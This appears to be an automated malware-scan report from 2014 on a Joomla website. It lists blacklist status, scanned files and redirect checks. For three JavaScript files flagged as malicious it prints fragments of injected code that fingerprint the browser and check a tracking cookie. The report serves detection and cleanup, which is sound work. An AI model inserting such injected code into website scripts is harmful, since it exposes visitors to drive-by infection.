Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=robertwgodwin.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://robertwgodwin.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://robertwgodwin.com/ | 200 OK Content-Length: 13159 Content-Type: text/html | clean |
http://robertwgodwin.com/media/system/js/modal.js | 200 OK Content-Length: 11586 Content-Type: application/javascript | clean |
http://robertwgodwin.com/components/com_k2/js/k2.js | 200 OK Content-Length: 4025 Content-Type: application/javascript | clean |
http://robertwgodwin.com/media/system/js/caption.js | 200 OK Content-Length: 2961 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if ( element.title != "" ) { container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); Antivirus reports:
| ||
http://robertwgodwin.com/modules/mod_AutsonSlideShow/js/jquery-1.5.2.min.js | 200 OK Content-Length: 86922 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); Antivirus reports:
| ||
http://robertwgodwin.com/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 4205 Content-Type: application/javascript | clean |
http://robertwgodwin.com/templates/ja_purity/js/ja.rightcol.js | 200 OK Content-Length: 2693 Content-Type: application/javascript | clean |
http://robertwgodwin.com/templates/ja_purity/js/ja.cssmenu.js | 200 OK Content-Length: 1576 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); sfEls[i].onmouseover=function() { clearTimeout(this.timer); if(this.className.indexOf(" sfhover") == -1) this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.timer = setTimeout(sfHoverOut.bind(this), 20); } } } function sfHoverOut() { clearTimeout(this.timer); this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } if (window.attachEvent) window.attachEvent("onload", sfHover); Antivirus reports:
| ||
http://robertwgodwin.com/modules/mod_AutsonSlideShow/js/jquery.easing.1.3.js | 200 OK Content-Length: 9095 Content-Type: application/javascript | clean |
http://robertwgodwin.com/modules/mod_AutsonSlideShow/js/jquery.animate-colors-min.js | 200 OK Content-Length: 2734 Content-Type: application/javascript | clean |
http://robertwgodwin.com/modules/mod_AutsonSlideShow/js/jquery.skitter.min.js | 200 OK Content-Length: 51240 Content-Type: application/javascript | clean |
http://robertwgodwin.com/index.php | 200 OK Content-Length: 13166 Content-Type: text/html | clean |
http://robertwgodwin.com/index.php?option=com_k2&view=itemlist&layout=category&task=category&id=1&Itemid=7 | 200 OK Content-Length: 19042 Content-Type: text/html | clean |
http://robertwgodwin.com/index.php?option=com_k2&view=item&layout=item&id=2&Itemid=8 | 200 OK Content-Length: 39156 Content-Type: text/html | clean |
http://robertwgodwin.com/index.php?option=com_k2&view=item&layout=item&id=3&Itemid=9 | 200 OK Content-Length: 18495 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: robertwgodwin.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 23 Aug 2014 16:49:18 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 23 Aug 2014 16:49:18 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 868126fe5e8df712ebe670abf4d103e0=81581a3ffa81a44fd06ee6ebbbde77aa; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Thu, 13-Aug-2015 16:49:18 GMT; path=/
X-Powered-By: PHP/5.4.31
GET / HTTP/1.1
Host: robertwgodwin.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 23 Aug 2014 16:49:18 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 23 Aug 2014 16:49:18 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 868126fe5e8df712ebe670abf4d103e0=81581a3ffa81a44fd06ee6ebbbde77aa; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Thu, 13-Aug-2015 16:49:18 GMT; path=/
X-Powered-By: PHP/5.4.31
Second query (visit from search engine):
GET / HTTP/1.1
Host: robertwgodwin.com
Referer: http://www.google.com/search?q=robertwgodwin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: robertwgodwin.com
Referer: http://www.google.com/search?q=robertwgodwin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.